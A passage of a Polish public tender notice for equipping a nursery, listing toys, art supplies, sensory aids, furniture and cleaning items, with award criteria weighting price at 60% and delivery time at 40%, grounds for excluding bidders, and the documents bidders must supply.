Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 3: Dostawa zabawek i wyposażenia edukacyjnego<br/>1	Zestaw papierów kreatywnych <br/>2	Zestaw papierów kreatywnych Wielkanoc<br/>3	Kredki długie grube<br/>4	Pastele suche <br/>5	Mazaki dwustronne <br/>6	Farby tempery w płynie <br/>7	Farby tempery pastelowe w płynie<br/>8	Tempery metaliczne<br/>9	Zestaw pędzli<br/>10	Duży zestaw stempli i pędzli<br/>11	Paleta do farb<br/>12	Podstawka do wałków malarskich<br/>13	Zestaw stempli <br/>14	Zestaw stempli<br/>15	Zestaw stempli<br/>16	Zestaw stempli<br/>17	Zestaw stempli<br/>18	Zestaw stempli<br/>19	Zestaw szablonów<br/>20	Zestaw szablonów<br/>21	Zestaw szablonów<br/>22	Zestaw szablonów<br/>23	Zestaw szablonów<br/>24	Zestaw szablonów<br/>25	Zestaw szablonów<br/>26	Zestaw szablonów<br/>27	Zestaw szablonów<br/>28	Zestaw szablonów<br/>29	Zestaw szablonów<br/>30	Zestaw szablonów<br/>31	Zestaw szablonów<br/>32	Zestaw szablonów<br/>33	Klej dla malucha<br/>34	Pistolet do kleju na gorąco<br/>35	Zestaw wkładów klejących<br/>36	Kółka gładkie do modelowania<br/>37	Kółka wzorki do modelowania<br/>38	Foremki do wykrawania<br/>39	Papier pastelowy do ksero<br/>40	Papier kolorowy<br/>41	Papier kolorowy <br/>42	Brystol biały<br/>43	Brystol kolorowy<br/>44	Papier metalizowany<br/>45	Papier brokatowy<br/>46	Papier opalizujący kolorowy<br/>47	Papier pakowy<br/>48	Zestaw filcowy<br/>49	Filcowe kwiatuszki<br/>50	Filcowe Boże Narodzenie<br/>51	Folia piankowa<br/>52	Zestaw bibuły pastelowej<br/>53	Zestaw bibuły kolorowej<br/>54	Ozdoby z folii piankowej<br/>55	Ozdoby z folii piankowej<br/>56	Ozdoby z folii piankowej<br/>57	Ozdoby z folii piankowej<br/>58	Kolorowe patyczki<br/>59	Taśma dwustronna<br/>60	Nożyczki biurowe<br/>61	Nożyczki z wzorkami<br/>62	Nożyczki biurowe<br/>63	Nożyk obrotowy wraz z ostrzami<br/>64	Zszywacz biurowy<br/>65	Dziurkacz biurowy<br/>66	Papier biały<br/>67	Kalkulator biurowy duży<br/>68	Gąsienica spacerowa<br/>69	Pasy bezpieczeństwa do gąsienicy spacerowej<br/>70	Spadochron/chusta animacyjna<br/>71	Wóz strażacki. Kącik manipulacyjny<br/>72	Pralnia. Drewniany kącik aktywności<br/>73	Straganik. . Drewniany kącik aktywności<br/>74	Mój mały dom. Kącik zabaw<br/>75	Tablica manipulacyjna Miś<br/>76	Miękkie podusie<br/>77	Kamizelka odblaskowa dla maluchów<br/>78	Naklejki ścienne. Aplikacje na ścianę. Drzewo i jego mieszkańcy<br/>79	Mały krokodyl. Tablica manipulacyjna<br/>80	Tablica suchościeralna<br/>81	Markery do tablic suchościeralnych 4 kolory + gąbka<br/>82	Piłeczki do basenów<br/>83	Rakieta kosmiczna. Mała tablica manipulacyjno-sensoryczna<br/>84	Straż pożarna. Mała tablica manipulacyjno-sensoryczna<br/>85	Kierownica. Mała tablica manipulacyjno-sensoryczna<br/>86	Tablica manipulacyjna. Samolot<br/>87	Mini labirynt z koralikami<br/>88	Labirynt przestrzenny z koralikami. Farmer<br/>89	Safari. Labirynt przestrzenny<br/>90	Stolik manipulacyjny. Zwierzęta<br/>91	Piramida manipulacyjno-dźwiękowa<br/>92	Piramida drewniana z sorterem<br/>93	Zwierzaki. Wieża sorter drewniany<br/>94	Wieża i sorter. Zabawka 2 w 1<br/>95	Sorter z klockami<br/>96	Misio z bryłami<br/>97	Rybki<br/>98	Miękka piłka z aktywnościami<br/>99	Zaczarowany ogród. Zestaw<br/>100	Edukacyjne pacynki Emocje<br/>101	Pacynki emocje<br/>102	Krążki do odreagowania emocji<br/>103	Wyciskanka. Bąbelkowy dysk sensoryczny<br/>104	Telefony fonetyczne bezprzewodowe. Zestaw klasowy<br/>105	Tablice manipulacyjne. Fala. Geometria<br/>106	Memo angielskie.Układanki. Skojarzenia. Przeciwieństawa. <br/>107	Figurki zwierząt<br/>108	Układanki drewniane. <br/>109	Układanka edukacyjna. Zawody<br/>110	Układanka sekwencyjna. Puzzle zwierzaki<br/>111	Puzzle zwierzaki<br/>112	Klocki wafle. Safari<br/>113	Klocki maxi. Cegły<br/>114	Miękkie klocki<br/>115	Klocki wafle elastyczne<br/>116	Piramidka. Klockowa wieża<br/>117	Nakładanki płaskie<br/>118	Zestaw piramidek<br/>119	Miękka zabawka sensoryczna. Piramidka<br/>120	Nakładanki z kołeczkami<br/>121	Pociąg dla najmłodszych. Zabawne wagoniki<br/>122	Garaż dwupoziomowy<br/>123	Pojazdy miękkie. Zabawki sensoryczne<br/>124	Pojazdy inżynieryjne.<br/>125	Wesołe pojazdy<br/>126	Traktor grzechotka<br/>127	Samochody budowlane<br/>128	Autka budowlane. Śmieciarka. Wywrotka<br/>129	Laweta z samochodami<br/>130	Wywrotka gigant.<br/>131	Betoniarka gigant<br/>132	Traktor – Spychacz gigant<br/>133	Wywrotka z przyczepą gigant<br/>134	Buldożer gigant<br/>135	Auto ciężarowe. Policja<br/>136	Śmieciarka<br/>137	Chodzik 3 w 1<br/>138	Wózek supermarket<br/>139	Skuter<br/>140	Skuter różowy<br/>141	Policyjny jeździk<br/>142	Ścigacz <br/>143	Samochód jeździk dla malucha<br/>144	Eco pojazd. Jeździk<br/>145	Tunel zygzak <br/>146	Tunel Stonoga<br/>147	Plastikowe bujaki<br/>148	Pluszowy Miś<br/>149	Siedzące Misie<br/>150	Przytulanka Szop<br/>151	Pluszowa żaba<br/>152	Pieluszka- przytulanka<br/>153	Miękkie lalki. Chłopczyk i dziewczynka<br/>154	Lalka bobas raczkujący<br/>155	Lalka bobas w ubranku.Chłopiec i dziewczynka<br/>156	Mówiący bobas<br/>157	Lalka bobas<br/>158	Wielopokoleniowa rodzina – małe laleczki<br/>159	Lalka miękki bobas<br/>160	Miękkie lalki chłopczyk i dziewczynka Mati i Nati<br/>161	Miękka lalka Agatka<br/>162	Miękka lalka<br/>163	Miękka lalka Mikołaj<br/>164	Lalki świata<br/>165	Lalki Maja i Gucio<br/>166	Wózek spacerowy dla lalek<br/>167	Zabawka kasa z kalkulatorem<br/>168	Zestaw do herbaty<br/>169	Zabawka produkty żywnościowe do krojenia<br/>170	Warzywa i owoce w drewnianych skrzynkach<br/>171	Drewniane owoce do krojenia<br/>172	Produkty żywnościowe plastikowe<br/>173	Warzywa plastikowe<br/>174	Owoce plastikowe<br/>175	Jajka<br/>176	Jajka<br/>177	Pieczywo<br/>178	Słodycze<br/>179	Interaktywne żelazko<br/>180	Odkurzacz<br/>181	Przyjęcie w ogrodzie <br/>182	Kosiarka<br/>183	Taczka z akcesoriami do ogrodu<br/>184	Wózek/przyczepka z kompletem do piasku<br/>185	Miękkie książeczki<br/>186	Rękawiczka pacynka<br/>187	Sensoryczna miękka gąsienica<br/>188	Kwiatek manipulacyjny<br/>189	Miękka poduszka w kształcie cukierka<br/>190	Miękka poduszka supełek<br/>191	Sensoryczny labirynt w kształcie ślimaka<br/>192	Makatka manipulacyjna<br/>193	Rybki magnetyczne. Puzzle<br/>194	Skrzynka manipulacyjna<br/>195	Drewniana kostka manipulacyjna<br/>196	Drewniana nakładanka w kształcie wieży/domku<br/>197	Magnetyczne puzzle 3D<br/>198	Układanka sekwencyjna<br/>199	Pufa z krążkami<br/>200	Miękkie klocki<br/>201	Klocki piankowe<br/>202	Układanka drewniana - Rybki<br/>203	Nakładanka: pojazdy<br/>204	Nakładanka: zwierzątka z farmy<br/>205	Nakładanka: zwierzątka z farmy<br/>206	Nakładanka geometryczna<br/>207	Puzzle kartonowe<br/>208	Tablica manipulacyjna Hipcio<br/>209	Gumowa farma<br/>210	Gumowe zwierzątka egzotyczne - pacynki<br/>211	Filcowe pacynki na palec z domkiem<br/>212	Naklejki ścienne. Bajki<br/>213	Piłka skacząca<br/>214	Jaśki sensoryczne<br/>215	Kolorowa kostka z lusterkami<br/>216	Tablica magnetyczna<br/>217	Ścieżka sensoryczna. Kamienie rzeczne<br/>218	Dysk sensoryczny<br/>219	Sensoryczne stopki<br/>220	Sensoryczne koła<br/>221	Pompka do piłek<br/>222	Zestaw do masażu i stymulacji. Drewniany<br/>223	Zestaw rękawic sensorycznych do masażu<br/>224	Projektor świetlny Led<br/>225	Ścieżka sensoryczna. Natura<br/>226	Zestaw z rampą i schodkami piankowymi<br/>227	Piłeczki do masażu. Fasolki<br/>228	Piłki piankowe<br/>229	Torby z pacynkami<br/>230	Instrumenty muzyczne<br/>231	Kolorowy telefon<br/>232	Telefon dla malucha<br/>233	Telefon z melodyjkami<br/>234	Mój pierwszy smartfon<br/>235	Elektroniczna mata do gry w klasy<br/>236	Kostka aktywności<br/>237	Bączek. Karuzela jednorożców<br/>238	Kierownica. Zabawka interaktywna<br/>239	Kostki. Zwierzaki i pojazdy<br/>240	Tęczowa piłka modułowa.<br/>241	Żółw z piłeczkami sensorycznymi<br/>242	Piankowe kostki z kropkami<br/>243	Piłka grzechocząca<br/>244	Zabawki do piaskownicy<br/>245	Zestaw majsterkowicza. <br/>246	Narzędzia budowlane<br/>247	Warsztat malucha<br/>248	Mata miasto<br/>249	Miasto. Duża składana mata<br/>250	Koparka gigant<br/>251	Motocykl<br/>252	Wędrująca gąsienica<br/>253	Mini autka. Zestaw przedszkolny<br/>254	Pociąg towarów i Pendolino<br/>255	Puzzle kartonowe XXL. Dżungla<br/>256	Farma zestaw puzzli kartonowych<br/>257	Puzzle kartonowe. Pojazdy<br/>258	Klocki piankowe magnetyczne<br/>259	Klocki piankowe magnetyczne<br/>260	Książeczki dla dzieci </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39162100-6 - Pomoce dydaktyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-08-18</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>1)	Cena (C) - waga kryterium 60 %;<br/>2)	Termin dostawy (TR) - waga kryterium 40 %.<br/>2.	Zasady oceny ofert w poszczególnych kryteriach:<br/>1)	Cena (C) - waga 60 %<br/>C = cena najniższa brutto*/ cena oferty ocenianej brutto x 100 pkt x 60 %<br/>* spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/>a)	Podstawą przyznania punktów w kryterium &#34;cena&#34; będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym.<br/>b)	Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/>2)	Formuła oceny w kryterium termin dostawy (TD):<br/>	maksymalny termin dostawy wynosi 21 dni – 0 pkt<br/>	za termin dostawy równy 14 dni – 20 pkt.<br/>	za termin dostawy równy 7 dni – 40 pkt.<br/>W kryterium termin dostawy Wykonawca otrzyma maksymalnie 40 pkt.<br/>W przypadku, w którym Wykonawca nie określi oferowanego terminy dostawy Zamawiający uzna, iż oferowany termin dostawy wynosi 21 dni. <br/>3.	Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>4.	W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>5.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą. Jeżeli zamawiający, dokona wyboru najkorzystniejszej oferty spośród niepodlegających odrzuceniu ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 4: Dostawa i montaż mebli i pozostałego wyposażenia<br/>1	Szelki zabezpieczające<br/>2	Łyżka żłobkowa<br/>3	Widelec żłobkowy<br/>4	Zestaw naczyń dla 5 dzieci<br/>5	Śliniak wodoodporny<br/>6	Krzesełko do karmienia<br/>7	Kojec<br/>8	Worki do kosza na pieluchy<br/>9	Kosz na pieluchy<br/>10	Mata antypoślizgowa<br/>11	Kosz na śmieci<br/>12	Kosz na śmieci Tygrysek<br/>13	Termometr bezdotykowy elektroniczny<br/>14	Nocnik<br/>15	Nakładka na toaletę<br/>16	Podajnik na ręcznik papierowy<br/>17	Podajnik na papier toaletowy<br/>18	Podajnik na mydło w płynie<br/>19	Łóżeczko <br/>20	Materac<br/>21	Barierki ochronne do łóżeczek<br/>22	Wózek do łóżeczek<br/>23	Pościel komplet<br/>24	Pościel komplet<br/>25	Podkład nieprzemakalny <br/>26	Leżaczek, bujaczek<br/>27	Przewijak dwuosobowy z burtami<br/>28	Pojemniki do przewijaka <br/>29	Schodki do przewijaka <br/>30	Materacyk do przewijaka<br/>31	Szafa na nocniki<br/>32	Szafa wisząca na pieluszki<br/>33	Regał wysoki <br/>34	Nadstawka do regału wysokiego<br/>35	Szafa na łóżeczka dziecięce i pościel<br/>36	Regał wysoki<br/>37	Biurko <br/>38	Krzesło ISO<br/>39	Dywan<br/>40	Przewijak z materacykiem<br/>41	Szafka ze skrytkami<br/>42	Półka wisząca<br/>43	Półka wisząca<br/>44	Komoda szeroka z szufladami<br/>45	Szafka z drzwiami<br/>46	Regał wysoki z drzwiami<br/>47	Nadstawka do regału wysokiego<br/>48	Drzwi do nadstawki <br/>49	Gruszka rehabilitacyjna<br/>50	Gruszka rehabilitacyjna<br/>51	Gruszka rehabilitacyjna<br/>52	Regał wysoki otwarty<br/>53	Szafka z pojemnikami plastikowymi<br/>54	Szafka z pojemnikami plastikowymi<br/>55	Krzesło dziecięce drewniane z podłokietnikami i szelkami.<br/>56	Krzesło dziecięce drewniane z podłokietnikami i szelkami.<br/>57	Prostokątny drewniany blat do stołu z zielonymi obrzeżami<br/>58	Komplet 4 drewanianych nóg do stołu <br/>59	Szafka narożna otwarta<br/>60	Dywan<br/>61	Kryjówka<br/>62	Aplikacje ścienne - konwalia<br/>63	Aplikacje ścienne - krzaczek<br/>64	Aplikacje ścienne - koniczynka<br/>65	Kącik aktywności z basenem na kulki<br/>66	Zestaw wypoczynkowy<br/>67	Piankowe siedziska kostki<br/>68	Piankowe siedziska kostki<br/>69	Siedzisko piankowe<br/>70	Siedzisko piankowe<br/>71	Kołderka obciążeniowa<br/>72	Kocyk obciążeniowy<br/>73	Kamizelka odblaskowa<br/>74	Parawan żłobkowy<br/>75	Szafka wisząca<br/>76	Szafka wisząca<br/>77	Stół kuchenny<br/>78	Zestaw mebli kuchennych<br/>79	Wysoka szafa z drzwiami<br/>80	Wózek z napędem elektrycznym do przewozu 6 dzieci<br/>81	Lustro łazienkowe<br/>82	Regał otwarty<br/>83	Tablica ścienna menu<br/>84	Sofa tapicerowana<br/>85	Tablica korkowa<br/>86	Regał wysoki z drzwiami i zamkiem<br/>87	Korpus szatni<br/>88	Szafa ubraniowa <br/>89	Regał mały<br/>90	Wieszak ubraniowy<br/>91	Tablica magnetyczna<br/>92	Panel akustyczny<br/>93	Godło Polski<br/>94	Dywan okrągły<br/>95	Regał średni z parą drzwi<br/>96	Szafka pod umywalkę<br/>97	Regał <br/>98	Półka wisząca<br/>99	Regał wysoki z drzwiami i zamkiem<br/>100	Szafa ubraniowa<br/>101	Komoda<br/>102	Fotel obrotowy<br/>103	Biurko <br/>104	Folia matowa na szybę<br/>105	Roleta plisowana zaciemniająca <br/>106	Roleta plisowana zaciemniająca<br/>107	Roleta plisowana zaciemniająca<br/>108	Roleta plisowana zaciemniająca<br/>109	Roleta plisowana zaciemniająca<br/>110	Roleta plisowana zaciemniająca<br/>111	Roleta plisowana zaciemniająca<br/>112	Roleta plisowana zaciemniająca<br/>113	Wózek dwuwiadrowy<br/>114	Zestaw mopowy<br/>115	Wkład do mopa<br/>116	Zmiotka z szufelką<br/>117	Szczotka z kijem<br/>118	Uchwyt ścienny na kij do mopów, trzonek od szczotki<br/>119	Wycieraczka podłogowa wejściowa </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39161000-8 - Meble przedszkolne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">39515000-5 - Zasłony, draperie, lambrekiny oraz rolety tekstylne</p> <p class="mb-0">39150000-8 - Różne meble i wyposażenie</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-08-18</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>1)	Cena (C) - waga kryterium 60 %;<br/>2)	Termin dostawy (TR) - waga kryterium 40 %.<br/>2.	Zasady oceny ofert w poszczególnych kryteriach:<br/>1)	Cena (C) - waga 60 %<br/>C = cena najniższa brutto*/ cena oferty ocenianej brutto x 100 pkt x 60 %<br/>* spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/>a)	Podstawą przyznania punktów w kryterium &#34;cena&#34; będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu Ofertowym.<br/>b)	Cena ofertowa brutto musi uwzględniać wszelkie koszty jakie Wykonawca poniesie w związku z realizacją przedmiotu zamówienia.<br/>2)	Formuła oceny w kryterium termin dostawy (TD):<br/>	maksymalny termin dostawy wynosi 21 dni – 0 pkt<br/>	za termin dostawy równy 14 dni – 20 pkt.<br/>	za termin dostawy równy 7 dni – 40 pkt.<br/>W kryterium termin dostawy Wykonawca otrzyma maksymalnie 40 pkt.<br/>W przypadku, w którym Wykonawca nie określi oferowanego terminy dostawy Zamawiający uzna, iż oferowany termin dostawy wynosi 21 dni. <br/>3.	Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki.<br/>4.	W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści złożonej oferty, w tym zaoferowanej ceny.<br/>5.	Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana za najkorzystniejszą. Jeżeli zamawiający, dokona wyboru najkorzystniejszej oferty spośród niepodlegających odrzuceniu ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 9</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający przed udzieleniem zamówienia na podstawie art. 274 ust. 1 ustawy PZP, wezwie Wykonawcę, którego oferta zostanie najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, terminie podmiotowych środków dowodowych, aktualnych na dzień złożenia podmiotowych środków dowodowych.<br/><br/><br/>2.1	potwierdzenie aktualności informacji zawartych w oświadczeniu, o którym mowa w Rozdziale IX pkt 1.2.1 SWZ w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego - stanowiącego załącznik nr 6 do SWZ.<br/><br/>2.2	Oświadczenie wykonawcy w zakresie art. 108 ust.1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 litego 2007 r. o ochronie konkurencji i i konsumentów (tj. Dz. U. z 2024 r. poz. 594 t.j.), z innym Wykonawcą, który złożył odrębną ofertę, albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej - stanowiące załącznik nr 4 do SWZ.<br/><br/>2.3	Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego o nie zaleganiu z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu- wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.<br/>2.4	Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymane w całości wykonania decyzji właściwego organu- wystawione nie wcześniej niż 3 miesiące przed upływem składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.<br/>2.5	Aktualne zaświadczenie o niezaleganiu z podatkami lokalnymi na rzecz administracji samorządowej. Zaświadczenia muszą być wystawione nie wcześniej niż 3 miesiące przed datą złożenia oferty.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający przed udzieleniem zamówienia na podstawie art. 274 ust. 1 ustawy PZP, wezwie Wykonawcę, którego oferta zostanie najwyżej oceniona, do złożenia w wyznaczonym, nie krótszym niż 5 dni, terminie podmiotowych środków dowodowych, aktualnych na dzień złożenia podmiotowych środków dowodowych.<br/>2.1	potwierdzenie aktualności informacji zawartych w oświadczeniu, o którym mowa w Rozdziale IX pkt 1.2.1 SWZ w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego - stanowiącego załącznik nr 6 do SWZ.<br/>2.2	Oświadczenie wykonawcy w zakresie art. 108 ust.1 pkt 5 ustawy Pzp, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 litego 2007 r. o ochronie konkurencji i i konsumentów (tj. Dz. U. z 2024 r. poz. 594 t.j.), z innym Wykonawcą, który złożył odrębną ofertę, albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej - stanowiące załącznik nr 4 do SWZ.<br/><br/>2.3	Aktualne zaświadczenie właściwego naczelnika urzędu skarbowego o nie zaleganiu z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu- wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.<br/>2.4	Aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymane w całości wykonania decyzji właściwego organu- wystawione nie wcześniej niż 3 miesiące przed upływem składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.<br/>2.5	Aktualne zaświadczenie o niezaleganiu z podatkami lokalnymi na rzecz administracji samorządowej. Zaświadczenia muszą być wystawione nie wcześniej niż 3 miesiące przed datą złożenia oferty.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 3.	Wezwanie Wykonawcy do złożenia podmiotowych oraz przedmiotowych środków dowodowych.<br/>3.1	Jeżeli Wykonawca nie złoży oświadczenia, o którym mowa w art. 125 ust 1, podmiotowych środków dowodowych, innych dokumentów lub oświadczeń składanych w postępowaniu lub są one niekompletne lub zawierają błędy, Zamawiający wezwie Wykonawcę odpowiednio do ich złożenia, poprawienia lub uzupełnienia w wyznaczonym terminie, chyba że:<br/>3.1.1	oferta Wykonawcy podlega odrzuceniu bez względu na jej złożenie, uzupełnienie lub poprawienie,<br/>3.1.2	zachodzą przestanki unieważnienia postępowania. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 3.1	Jeżeli Wykonawca nie złoży oświadczenia, o którym mowa w art. 125 ust 1, podmiotowych środków dowodowych, innych dokumentów lub oświadczeń składanych w postępowaniu lub są one niekompletne lub zawierają błędy, Zamawiający wezwie Wykonawcę odpowiednio do ich złożenia, poprawienia lub uzupełnienia w wyznaczonym terminie, chyba że:<br/>3.1.1	oferta Wykonawcy podlega odrzuceniu bez względu na jej złożenie, uzupełnienie lub poprawienie,<br/>3.1.2	zachodzą przestanki unieważnienia postępowania. <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 8.	Wykonawca przedłoży Zamawiającemu najpóźniej w dniu zrealizowania całości zamówienia dokumenty dotyczące przedmiotu umowy, tj.: dokumenty gwarancyjne, zalecenia, wymagania i instrukcje opracowane przez producentów i dostawców dotyczące sposobu i warunków prawidłowego użytkowania, instrukcje obsługi i konserwacji oraz karty katalogowe, świadectwa jakości, certyfikaty, świadectwa wykonania prób, atesty – o ile zostały wydane. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> 